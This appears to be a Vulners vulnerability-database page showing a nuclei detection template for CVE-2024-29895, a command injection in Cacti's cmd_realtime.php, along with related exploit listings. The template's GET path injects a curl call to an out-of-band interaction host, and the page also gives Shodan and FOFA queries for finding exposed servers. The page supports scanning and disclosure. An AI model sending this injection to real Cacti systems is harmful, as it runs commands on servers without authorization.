Lucene search
K

Cacti cmd_realtime.php - Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 176 Views

Cacti cmd_realtime.php Command Injection vulnerability allows unauthenticated users to execute arbitrary command

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2024-29895
17 May 202422:03
githubexploit
GithubExploit
Exploit for CVE-2024-29895
15 May 202413:11
githubexploit
GithubExploit
Exploit for CVE-2024-29895
16 May 202420:03
githubexploit
GithubExploit
Exploit for CVE-2024-29895
16 May 202406:29
githubexploit
BDU FSTEC
The vulnerability of the “register_argc_argv” option in the Cacti network monitoring software allows a hacker to execute arbitrary commands.
16 May 202400:00
bdu_fstec
Circl
CVE-2024-29895
14 May 202414:35
circl
CNNVD
Cacti 安全漏洞
14 May 202400:00
cnnvd
CVE
CVE-2024-29895
13 May 202414:33
cve
Cvelist
CVE-2024-29895 Cacti command injection in cmd_realtime.php
13 May 202414:33
cvelist
Debian CVE
CVE-2024-29895
13 May 202414:33
debiancve
Rows per page
id: CVE-2024-29895

info:
  name: Cacti cmd_realtime.php - Command Injection
  author: pussycat0x
  severity: critical
  description: |
    Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP.
  impact: |
    Authenticated attackers can inject and execute arbitrary commands on the Cacti server.
  remediation: |
    Update Cacti to a version that patches the command injection vulnerability.
  reference:
    - https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC
    - https://github.com/Cacti/cacti/blob/501712998589763d411a68d35e3cda98fd9cfd18/cmd_realtime.php#L119
    - https://github.com/Cacti/cacti/commit/53e8014d1f082034e0646edc6286cde3800c683d
    - https://github.com/Cacti/cacti/commit/99633903cad0de5ace636249de16f77e57a3c8fc
    - https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2024-29895
    cwe-id: CWE-77
    epss-score: 0.94294
    epss-percentile: 0.9984
  metadata:
    max-request: 1
    vendor: cacti
    product: cacti
    shodan-query: http.favicon.hash:-1797138069
    fofa-query: icon_hash="-1797138069"
  tags: cve,cve2024,cacti,rce,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/cacti/cmd_realtime.php?1+1&&curl%20{{interactsh-url}}+1+1+1"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: curl"

      - type: status
        status:
          - 200
# digest: 4a0a004730450221009b416e113ffc5a145c78b9d8c9edcc2b8b4f206dff92a1d9f3f964ce21db61d202200c5df75fe04325ac79a530c934e7e9b2392fa8a0a9471a604de4c7aa8147df97:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.110
EPSS0.94294
SSVC
176